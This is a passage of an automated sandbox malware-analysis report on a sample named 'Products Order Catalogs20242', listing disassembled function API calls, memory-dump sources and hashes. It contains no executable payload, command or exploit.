                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                • String ID:
                                                                                                • API String ID: 2223660684-0
                                                                                                • Opcode ID: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                                                                                                • Instruction ID: 8f2921e390180aa9c6083979f061463a0462abb68b72a76a452ff5fd2bc04521
                                                                                                • Opcode Fuzzy Hash: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                                                                                                • Instruction Fuzzy Hash: 35F08C362422019F82249B59EA488DBB3FDEBE97213009C2FE142C32108BB5F806CB75
                                                                                                APIs
                                                                                                  • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                  • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                  • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                • MoveToEx.GDI32(?,?,00000000,00000000), ref: 0044728F
                                                                                                • LineTo.GDI32(?,00000000,00000002), ref: 004472A0
                                                                                                • EndPath.GDI32(?), ref: 004472B0
                                                                                                • StrokePath.GDI32(?), ref: 004472BE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                                                • String ID:
                                                                                                • API String ID: 2783949968-0
                                                                                                • Opcode ID: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                                                                                • Instruction ID: 15f667079dd022c0076d5117e5ffb33549464faf874781034dcdd6a9c0a79bb3
                                                                                                • Opcode Fuzzy Hash: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                                                                                • Instruction Fuzzy Hash: 46F09030109361BFE211DB10DC0AF9F3B98AB46310F10490CF641622D2C7B46845C7BA
                                                                                                APIs
                                                                                                • __getptd.LIBCMT ref: 00417D1A
                                                                                                  • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                                                                                                  • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                                                                                                • __getptd.LIBCMT ref: 00417D31
                                                                                                • __amsg_exit.LIBCMT ref: 00417D3F
                                                                                                • __lock.LIBCMT ref: 00417D4F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                • String ID:
                                                                                                • API String ID: 3521780317-0
                                                                                                • Opcode ID: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
                                                                                                • Instruction ID: 784cd6646040312d8c3929352b57c791f513dbd9ce30c249d09a92555f0e5bc7
                                                                                                • Opcode Fuzzy Hash: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
                                                                                                • Instruction Fuzzy Hash: D4F06D319447089AD720FB66E4067EA32B0AF01728F11856FA4415B7D2DB3C99C08B9E
                                                                                                APIs
                                                                                                • GetDesktopWindow.USER32 ref: 00471144
                                                                                                • GetDC.USER32(00000000), ref: 0047114D
                                                                                                • GetDeviceCaps.GDI32(00000000,00000074), ref: 0047115A
                                                                                                • ReleaseDC.USER32(00000000,?), ref: 0047117B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                • String ID:
                                                                                                • API String ID: 2889604237-0
                                                                                                • Opcode ID: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                                                                                                • Instruction ID: a1da8b046b56c0024f4e51319ca7c868ce9b42ab557c4db2e47d6af70bf9fcef
                                                                                                • Opcode Fuzzy Hash: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                                                                                                • Instruction Fuzzy Hash: 75F05E759042009FC310DF65DC4856EBBA4FB94351F108C3EFD05D2251DB7889059B99
                                                                                                APIs
                                                                                                • GetDesktopWindow.USER32 ref: 00471102
                                                                                                • GetDC.USER32(00000000), ref: 0047110B
                                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00471118
                                                                                                • ReleaseDC.USER32(00000000,?), ref: 00471139
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                • String ID:
                                                                                                • API String ID: 2889604237-0
                                                                                                • Opcode ID: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                                                                                                • Instruction ID: 5204c471e266b2ed5cdb435334cd6f206910ee07043e0bb223494c3f632f6575
                                                                                                • Opcode Fuzzy Hash: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                                                                                                • Instruction Fuzzy Hash: 78F05E759042009FD310EF65DC5896EBBA4FB94351F104C3EFC05D2251DB7489059B99
                                                                                                APIs
                                                                                                • SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                                                                                                • GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 004389DA
                                                                                                • AttachThreadInput.USER32(00000000), ref: 004389E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                • String ID:
                                                                                                • API String ID: 2710830443-0
                                                                                                • Opcode ID: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
                                                                                                • Instruction ID: 438da6915ae72ab6a15f098678a9856147cbf2dc0a85cf0a700465948addd5b0
                                                                                                • Opcode Fuzzy Hash: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
                                                                                                • Instruction Fuzzy Hash: 14E012712853107BE72157509D0EFAF7B98AF18B11F14481EB241B50D0DAF8A941876E
                                                                                                APIs
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004390CD
                                                                                                • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 004390DB
                                                                                                • CloseHandle.KERNEL32(?,?,000000FF), ref: 004390EB
                                                                                                • CloseHandle.KERNEL32(?,?,000000FF), ref: 004390F0
                                                                                                  • Part of subcall function 00438FB6: GetProcessHeap.KERNEL32(00000000,?,00439504,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FC1
                                                                                                  • Part of subcall function 00438FB6: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00438FC8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                • String ID:
                                                                                                • API String ID: 146765662-0
                                                                                                • Opcode ID: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
                                                                                                • Instruction ID: e19b07cb6d87eea3d85dfea562759309df1919ba68b29a0146d7a5ec0ea3c710
                                                                                                • Opcode Fuzzy Hash: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
                                                                                                • Instruction Fuzzy Hash: 5DE0C976504311ABC620EB65DC48C4BB7E9EF883303114E1DF89693260CA74E881CB65
                                                                                                APIs
                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00414070
                                                                                                  • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
                                                                                                • __getptd_noexit.LIBCMT ref: 00414080
                                                                                                • __freeptd.LIBCMT ref: 0041408A
                                                                                                • ExitThread.KERNEL32 ref: 00414093
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                                                • String ID:
                                                                                                • API String ID: 3182216644-0
                                                                                                • Opcode ID: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
                                                                                                • Instruction ID: 8c1b811a677bc0208766d104aadce1409d27245c16b3af4a320e27a455eae914
                                                                                                • Opcode Fuzzy Hash: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
                                                                                                • Instruction Fuzzy Hash: F8D0EC7051024256D6207BA7ED097AA3A589B44B26B15446EA905801B1DF68D9C1862D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: BuffCharLower
                                                                                                • String ID: $8'I
                                                                                                • API String ID: 2358735015-3608026889
                                                                                                • Opcode ID: e3039598ad07eb1683e22d1e13845cc1c6bfaba1fe80df618d976ecbdfba683b
                                                                                                • Instruction ID: 1bf34105e022c250dd7240f1ea7ec4803edb57b208c13e69c3fb06210d7c4844
                                                                                                • Opcode Fuzzy Hash: e3039598ad07eb1683e22d1e13845cc1c6bfaba1fe80df618d976ecbdfba683b
                                                                                                • Instruction Fuzzy Hash: 9FE1AE745043018BCB24EF16D88166BB7E4BF94348F40482FF88597292EB79DD89CB9B
                                                                                                APIs
                                                                                                • OleSetContainedObject.OLE32(00000000,00000001), ref: 0047857A
                                                                                                  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                  • Part of subcall function 00445513: OleSetContainedObject.OLE32(?,00000000), ref: 00445593
                                                                                                  • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: CopyVariant$ContainedObject$ErrorLast_malloc
                                                                                                • String ID: AutoIt3GUI$Container
                                                                                                • API String ID: 3380330463-3941886329
                                                                                                • Opcode ID: a9ff7069b9b8d6ccd49eba872ad7efd2467de888f1098c4430e935d21ee713db
                                                                                                • Instruction ID: 8a51a4197b359b89da059ec4b883cd23719ad159cb4f439b8c2c8f5fea4c1b32
                                                                                                • Opcode Fuzzy Hash: a9ff7069b9b8d6ccd49eba872ad7efd2467de888f1098c4430e935d21ee713db
                                                                                                • Instruction Fuzzy Hash: FEA16A71240601AFC760EF69C880A6BB7E9FB88304F10892EF649CB361EB75E945CB55
                                                                                                APIs
                                                                                                • _wcslen.LIBCMT ref: 00409A61
                                                                                                  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                  • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                  • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                  • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                • String ID: 0vH
                                                                                                • API String ID: 1143807570-3662162768
                                                                                                • Opcode ID: c09e7a550d587b66afd16ae3f9308ee528eb86d4dd4285a1c93ad52bd0ffcd86
                                                                                                • Instruction ID: 5e67718e4417cbef977f4cc7974cb0b4b39b480e5382bb1977b3cac956c07efc
                                                                                                • Opcode Fuzzy Hash: c09e7a550d587b66afd16ae3f9308ee528eb86d4dd4285a1c93ad52bd0ffcd86
                                                                                                • Instruction Fuzzy Hash: 53515BB1A083009FC718CF18C48065BB7E1FF88314F54856EF9999B391D779E942CB96
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: HH$HH
                                                                                                • API String ID: 0-1787419579
                                                                                                • Opcode ID: fed4e066af51e45fc8c5976399addcc25001bc25a5639efd16b547c1275b717f
                                                                                                • Instruction ID: b2aab3850ea6996be17d3b26b1a0d96f4757dd5de2ef7d298d9c2790e2b3b10f
                                                                                                • Opcode Fuzzy Hash: fed4e066af51e45fc8c5976399addcc25001bc25a5639efd16b547c1275b717f
                                                                                                • Instruction Fuzzy Hash: 1241BF367042009FC310EF69E881F5AF3A1EF99314F548A6EFA589B381D776E811CB95
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: InfoItemMenu_memset
                                                                                                • String ID: 0
                                                                                                • API String ID: 2223754486-4108050209
                                                                                                • Opcode ID: 4788cf6f182db8212a4dd4ca04636ab1929000af0f3277abda7ed9995d735732
                                                                                                • Instruction ID: 143d79469fb3e570aa9bb1e7a79db7ad77638f8ab3c2e89d41e08a42c99b444e
                                                                                                • Opcode Fuzzy Hash: 4788cf6f182db8212a4dd4ca04636ab1929000af0f3277abda7ed9995d735732
                                                                                                • Instruction Fuzzy Hash: CB3101721043009BF3249F18DC85BABBBE4EBC6310F14081FFA90C62A0E379D949C75A
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 0044846C
                                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044847E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID: '
                                                                                                • API String ID: 3850602802-1997036262
                                                                                                • Opcode ID: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                                                                                                • Instruction ID: cecdca06d5aa7ecc7109d5e1ff25192cbd540bafe2d1ef24ff7c1b98f096cb5f
                                                                                                • Opcode Fuzzy Hash: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                                                                                                • Instruction Fuzzy Hash: 984179706083459FE710CF18C880BABB7E1FB89700F54882EF9888B351DB75A841CF5A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0
                                                                                                • API String ID: 0-4108050209
                                                                                                • Opcode ID: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
                                                                                                • Instruction ID: 268d240ecd79f719a1425e83c09d650ed443e1bf0ac8ef4f8d51517adc50c1d2
                                                                                                • Opcode Fuzzy Hash: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
                                                                                                • Instruction Fuzzy Hash: B6210D765042206BEB15DF08D844B97B7A4FBDA310F44492BEE9897250D379E848C7AA
                                                                                                APIs
                                                                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00451305
                                                                                                • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00451313
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID: Combobox
                                                                                                • API String ID: 3850602802-2096851135
                                                                                                • Opcode ID: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
                                                                                                • Instruction ID: f266216a818347eeb58d59163185d0479ace604409515c443b0f4894c7ad90f2
                                                                                                • Opcode Fuzzy Hash: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
                                                                                                • Instruction Fuzzy Hash: D9110A72A0430067E6109AA4DC80F5BB3D8EB99735F10071BFA24E72E1D774FC448768
                                                                                                APIs
                                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 004515DA
                                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004515EA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: LengthMessageSendTextWindow
                                                                                                • String ID: edit
                                                                                                • API String ID: 2978978980-2167791130
